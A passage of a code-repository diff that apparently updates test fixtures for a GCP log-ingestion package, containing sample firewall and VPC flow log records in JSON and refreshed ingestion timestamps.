35.85023465Z\"}", + "ingested": "2021-12-09T13:37:43.705622700Z", + "original": 
"{\"insertId\":\"5a27u1g22jks8t\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.42.0.10\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.168.2.114\",\"src_port\":45062},\"disposition\":\"ALLOWED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-es\",\"zone\":\"us-east1-b\"},\"remote_instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-kibana\",\"zone\":\"us-east1-b\"},\"remote_location\":{\"continent\":\"America\",\"country\":\"usa\"},\"remote_vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"rule_details\":{\"action\":\"ALLOW\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"9200\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:allow9200\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"allow9200\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:54:45.189726185Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:54:35.85023465Z\"}", "kind": "event", "action": "firewall-rule", "id": "5a27u1g22jks8t", 
@@ -2215,7 +2182,7 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.147513900Z", + "ingested": "2021-12-09T13:37:43.705628300Z", "original": "{\"insertId\":\"1dobeotg13df9f5\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"10.42.0.10\",\"src_port\":57794},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-es\",\"zone\":\"us-east1-b\"},\"remote_vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-06T16:41:45.009675991Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-06T16:41:38.394575419Z\"}", "kind": "event", "action": "firewall-rule", diff --git a/packages/gcp/data_stream/vpcflow/_dev/test/pipeline/test-vpcflow.log b/packages/gcp/data_stream/vpcflow/_dev/test/pipeline/test-vpcflow.log index 6e27f806daa..9d9cf86c8df 100644 --- a/packages/gcp/data_stream/vpcflow/_dev/test/pipeline/test-vpcflow.log +++ b/packages/gcp/data_stream/vpcflow/_dev/test/pipeline/test-vpcflow.log 
@@ -1,296 +1,296 @@ -{"insertId":"ut8lbrffooxyw","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"203.0.113.12","dest_port":33478,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:45:37.301953198Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:45:37.186193305Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxzb","jsonPayload":{"bytes_sent":"173663","connection":{"dest_ip":"10.87.40.76","dest_port":33970,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"68","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466657665Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"75801985404352
8829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxze","jsonPayload":{"bytes_sent":"155707","connection":{"dest_ip":"203.0.113.134","dest_port":33576,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821143836Z","packets_sent":"78","reporter":"SRC","rtt_msec":"201","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510622432Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxyz","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"192.0.2.23","dest_port":59679,"protocol":6,"src_ip":"10.139.99.242","src_port":22},"dest_location":{"asn":49505,"city":"Saint Petersburg","continent":"Europe","country":"rus","region":"Saint 
Petersburg"},"end_time":"2019-06-14T03:40:46.031032701Z","packets_sent":"1","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:45.860349247Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxz6","jsonPayload":{"bytes_sent":"1784","connection":{"dest_ip":"192.0.2.117","dest_port":50646,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:40:37.048196137Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:36.895188084Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} 
-{"insertId":"ut8lbrffooxzf","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.0.2.117","src_port":50646},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:37.048196137Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:40:36.895188084Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxz1","jsonPayload":{"bytes_sent":"186151","connection":{"dest_ip":"10.87.40.76","dest_port":33692,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"251","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_
name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxyp","jsonPayload":{"bytes_sent":"15169","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33880},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821308944Z","packets_sent":"92","reporter":"SRC","rtt_msec":"3","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.469099728Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} 
-{"insertId":"ut8lbrffooxzd","jsonPayload":{"bytes_sent":"250864","connection":{"dest_ip":"10.87.40.76","dest_port":33554,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"247","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500506974Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} 
-{"insertId":"ut8lbrffooxz8","jsonPayload":{"bytes_sent":"167939","connection":{"dest_ip":"10.87.40.76","dest_port":33880,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821308944Z","packets_sent":"63","reporter":"DEST","rtt_msec":"3","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.469099728Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"}
-{"insertId":"ut8lbrffooxyt","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"10.139.99.242","dest_port":22,"protocol":6,"src_ip":"192.0.2.23","src_port":59679},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:46.031032701Z","packets_sent":"3","reporter":"DEST","src_location":{"asn":49505,"city":"Saint Petersburg","continent":"Europe","country":"rus","region":"Saint Petersburg"},"start_time":"2019-06-14T03:40:45.860349247Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"}
-{"insertId":"ut8lbrffooxz5","jsonPayload":{"bytes_sent":"11773","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33576},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821056075Z","packets_sent":"94","reporter":"DEST","rtt_msec":"201","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510622432Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"}
-{"insertId":"ut8lbrffooxza","jsonPayload":{"bytes_sent":"65699","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33562},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.393910944Z","packets_sent":"356","reporter":"DEST","rtt_msec":"192","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074897435Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} 
-{"insertId":"ut8lbrffooxyq","jsonPayload":{"bytes_sent":"66029","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33692},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"361","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} 
-{"insertId":"ut8lbrffooxz2","jsonPayload":{"bytes_sent":"65154","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33542},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565272745Z","packets_sent":"360","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150720950Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} 
-{"insertId":"ut8lbrffooxyo","jsonPayload":{"bytes_sent":"13643","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33970},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"99","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466657665Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} 
-{"insertId":"ut8lbrffooxzc","jsonPayload":{"bytes_sent":"34509840","connection":{"dest_ip":"10.49.136.133","dest_port":46864,"protocol":6,"src_ip":"203.0.113.93","src_port":9243},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"simianhacker-demo","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:29.432367659Z","packets_sent":"8690","reporter":"DEST","rtt_msec":"36","start_time":"2019-06-14T03:40:17.343890802Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"}
-{"insertId":"ut8lbrffooxz7","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.12","src_port":34836},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:48:39.076420731Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:48:38.961050187Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"}
-{"insertId":"ut8lbrffooxyu","jsonPayload":{"bytes_sent":"63671","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33554},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"367","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500506974Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} 
-{"insertId":"ut8lbrffooxyv","jsonPayload":{"bytes_sent":"51075","connection":{"dest_ip":"203.0.113.58","dest_port":65320,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220714119Z","packets_sent":"608","reporter":"SRC","rtt_msec":"220","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.560917237Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"}
-{"insertId":"ut8lbrffooxz0","jsonPayload":{"bytes_sent":"197840","connection":{"dest_ip":"203.0.113.134","dest_port":33562,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.393910944Z","packets_sent":"258","reporter":"SRC","rtt_msec":"192","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074897435Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"}
-{"insertId":"ut8lbrffooxys","jsonPayload":{"bytes_sent":"173805495","connection":{"dest_ip":"203.0.113.93","dest_port":9243,"protocol":6,"src_ip":"10.49.136.133","src_port":46864},"end_time":"2019-06-14T03:49:58.716492806Z","packets_sent":"44438","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"simianhacker-demo","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:17.306085222Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"}
-{"insertId":"ut8lbrffooxyx","jsonPayload":{"bytes_sent":"1468","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.12","src_port":33478},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:45:37.301953198Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:45:37.186193305Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"}
-{"insertId":"ut8lbrffooxz4","jsonPayload":{"bytes_sent":"159704","connection":{"dest_ip":"203.0.113.134","dest_port":33548,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.393651211Z","packets_sent":"241","reporter":"SRC","rtt_msec":"50","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147252064Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} 
-{"insertId":"ut8lbrffooxz3","jsonPayload":{"bytes_sent":"70775","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65320},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220714119Z","packets_sent":"732","reporter":"DEST","rtt_msec":"220","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.560917237Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"}
